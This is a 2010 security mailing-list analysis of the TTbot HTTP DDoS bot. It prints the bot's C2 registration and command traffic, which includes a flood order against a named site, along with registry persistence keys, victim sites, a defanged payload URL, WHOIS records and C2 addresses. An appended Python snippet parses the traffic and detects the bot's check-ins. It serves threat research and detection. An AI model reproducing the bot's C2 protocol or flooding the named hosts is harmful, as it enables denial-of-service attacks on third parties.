[nsp-sec] TTbot DDoS bot analysis
jose nazario
jose at arbor.net
Sat Mar 20 12:55:58 EDT 2010
------[ SUMMARY
spotted this in our zoo this morning, another HTTP DDoS bot.
identifying mark: User-Agent: TT-Bot 1.0.0 in the client requests.
i have no idea if this is a kit, this one appears to be in limited
use. i have not explored the server-side of it.
we are tracking this.
-----[ HTTP COMMUNICATIONS
communications are two stage. the first stage is registration, where
the bot gets its ID:
| POST /register.php HTTP/1.1
| Host: panel.ntpupdatedomain.com
| User-Agent: TT-Bot 1.0.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 71
|
| ccode=US&nat=1&os=5.1&owner=1&pcname=[Hostname]&username=[Username]&version=100
| HTTP/1.1 200 OK
| Server: nginx/0.7.64
| Date: Thu, 18 Mar 2010 02:30:05 GMT
| Content-Type: text/html
| Transfer-Encoding: chunked
| Connection: keep-alive
| X-Powered-By: PHP/5.2.6-1+lenny4
| Set-Cookie: PHPSESSID=170b66d3e291e99e27f5441b2b5d935a; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma: no-cache
| 28
| \t\t\t<R><id>17465</id></R><I><c>45</c></I>
| 0
this ID is then used to get the command from the botnet:
| POST /command.php HTTP/1.1
| Host: panel.ntpupdatedomain.com
| User-Agent: TT-Bot 1.0.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 8
|
| id=17465
| HTTP/1.1 200 OK
| Server: nginx/0.7.64
| Date: Thu, 18 Mar 2010 02:30:50 GMT
| Content-Type: text/html
| Transfer-Encoding: chunked
| Connection: keep-alive
| X-Powered-By: PHP/5.2.6-1+lenny4
| Set-Cookie: PHPSESSID=c88dea160e6476d2c312d1b2e27ca4d1; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| Pragma: no-cache
| 68
| \t\t\t<C><id>487</id><m>4</m><c>3</c><p0>www.dollaropoker.com</p0><p1>80</p1><p2>9</p2></C><I><c>60</c></I>
| 0
in this case the bot is told to DDoS (HTTP flood) www.dollaropoker.com.
--------[ MALCODE BEHAVIORS ON HOST
static analysis suggests that it's written in MS VB 6.
drops and then deletes: C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
drops and then deletes: C:\Documents and Settings\[Username]\Application Data\svchost.exe
Mutex: dsbfjdagr4523
It wouldn't be a bot without some registry sets:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Systemhost:
  C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
HKEY_CURRENT_USER\Console\FL_Steam:
  [REG_DWORD, value: 00000001]
HKEY_CURRENT_USER\Console\ID:
  [REG_DWORD, value: 000000E1]
HKEY_CURRENT_USER\Console\SECSERVER:
  connect.tt-bot.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Systemhost:
  C:\Documents and Settings\[Username]\Application Data\ctfmon.exe
HKEY_CURRENT_USER\Console\ID:
  [REG_DWORD, value: 00000022]
HKEY_CURRENT_USER\Console\SECSERVER:
  p.tt-bot.com
-----[ DDOS ACTIVITY SEEN SO FAR
victims seen DDoSed so far:
http://www.hydrodreams.ch/
http://www.dollaropoker.com/
he's also told the bots (in the past) to download:
hxxp://knechtstyle.funpic.de/v52.exe
------[ DOMAIN NAMES
sadly two of the domains are privacy protected BUT they look shady as
hell. ttbot.net, tt-bot.com and tt-bot.ru have been used (seen in
registry keys):
[whois.PublicDomainRegistry.com]
Registration Service Provider:
LovingName.com - E-Gold Domain Registration
Accept Liberty Reserve, e-Bullion, E-Gold, PayPal, MoneyBookers,
WebMoney, Pecunix
Domain Name: TT-BOT.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact at privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 03-Oct-2009
Expiration Date: 03-Oct-2010
Domain servers in listed order:
ns2.2x4hosting.ru
ns1.2x4hosting.ru
Domain Name: ttbot.net
Registrar: Name.com LLC
Protected Domain Services Customer ID: NCR-1191739
Expiration Date: 2010-11-19 12:50:35
Creation Date: 2009-11-19 12:50:35
Name Servers:
NS1.NAME.COM
NS2.NAME.COM
NS3.NAME.COM
NS4.NAME.COM
REGISTRANT CONTACT INFO
Protected Domain Services - Customer ID: NCR-1191739
125 Rampart Way
Suite 300
Denver
CO
80230
US
Phone: +1.7202492374
Email Address: ttbot.net at protecteddomainservices.com
[whois.ripn.net]
domain: TT-BOT.RU
nserver: ns1.everydns.net.
nserver: ns2.everydns.net.
nserver: ns3.everydns.net.
nserver: ns4.everydns.net.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 4957564482
e-mail: mail at sunfighter.us
registrar: REGTIME-REG-RIPN
created: 2009.10.07
paid-till: 2010.10.07
source: TCI
Last updated on 2010.03.18 16:24:00 MSK/MSD
--------[ KNOWN CnCs
http://connect.tt-bot.ru/command.php
connect.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks
http://panel.ntpupdatedomain.com/command.php
panel.ntpupdatedomain.com. 800 IN A 92.241.165.161
AS | IP | AS Name
41947 | 92.241.165.161 | WEBALTA-AS Wahome networks
------[ HOSTNAMES REFERENCED
hostnames referenced in the bot's registry:
panel.tt-bot.ru is an alias for panel.vps100.tt-bot.ru.
panel.vps100.tt-bot.ru is an alias for vps100.ttbot.net.
vps100.ttbot.net has address 217.23.5.100
connect.tt-bot.com has address 92.241.169.250
p.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
49981 | 217.23.5.100 | WORLDSTREAM WorldStream
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks
_____________________________
jose nazario, ph.d. jose at arbor.net
sr. manager of security research, arbor networks
http://asert.arbor.net/
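As an added example (not from the post, and not the bot's own code), the Python below de-chunks the two responses quoted above, parses the TT-Bot XML fragments, and flags the User-Agent/path pair that identifies the bot's check-ins in a proxy or web log. Treating <I><c> as the next check-in delay and <p0>/<p1> as the target host and port is an assumption; <m>, <c> and <p2> are carried through unlabelled.

```python
import re
import xml.etree.ElementTree as ET

# Constructed from the two chunked responses quoted in the post:
# hex chunk-size line, chunk data, terminating "0" chunk.
REGISTER_BODY = "28\r\n\t\t\t<R><id>17465</id></R><I><c>45</c></I>\r\n0\r\n\r\n"
COMMAND_BODY = ("68\r\n\t\t\t<C><id>487</id><m>4</m><c>3</c><p0>www.dollaropoker.com</p0>"
                "<p1>80</p1><p2>9</p2></C><I><c>60</c></I>\r\n0\r\n\r\n")
# Constructed request, modelled on the command poll quoted in the post.
SAMPLE_REQUEST = ("POST /command.php HTTP/1.1\r\nHost: panel.ntpupdatedomain.com\r\n"
                  "User-Agent: TT-Bot 1.0.0\r\nContent-Length: 8\r\n\r\nid=17465")

def dechunk(body: str) -> str:
    """Reassemble an HTTP/1.1 chunked body (chunk sizes are hex)."""
    out, pos = [], 0
    while True:
        nl = body.index("\r\n", pos)
        size = int(body[pos:nl].split(";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return "".join(out)
        out.append(body[nl + 2:nl + 2 + size])
        pos = nl + 2 + size + 2  # step over the data and its trailing CRLF

def parse_ttbot(payload: str) -> dict:
    """Parse a TT-Bot XML fragment. Assumption: <I><c> is the next check-in
    delay; <p0>/<p1> of a <C> are target host/port (m, c, p2 are left raw)."""
    root = ET.fromstring("<root>" + payload.strip() + "</root>")  # two sibling roots
    result = {"checkin": int(root.findtext("I/c"))}
    if root.find("R") is not None:                      # registration reply
        result.update(type="register", bot_id=int(root.findtext("R/id")))
    elif (cmd := root.find("C")) is not None:           # command reply
        result.update(type="command", cmd_id=int(cmd.findtext("id")),
                      m=int(cmd.findtext("m")), c=int(cmd.findtext("c")),
                      params=[p.text for p in cmd if re.fullmatch(r"p\d+", p.tag)])
        if len(result["params"]) >= 2:
            result["target"] = f"{result['params'][0]}:{result['params'][1]}"
    return result

def is_ttbot_request(raw: str) -> bool:
    """Flag the identifying mark from the post: UA 'TT-Bot 1.0.0' on a POST
    to /register.php or /command.php."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    ua = next((l.split(":", 1)[1].strip() for l in lines[1:]
               if l.lower().startswith("user-agent:")), "")
    path_ok = lines[0].split(" ")[0:2] in (["POST", "/register.php"],
                                          ["POST", "/command.php"])
    return path_ok and ua == "TT-Bot 1.0.0"
```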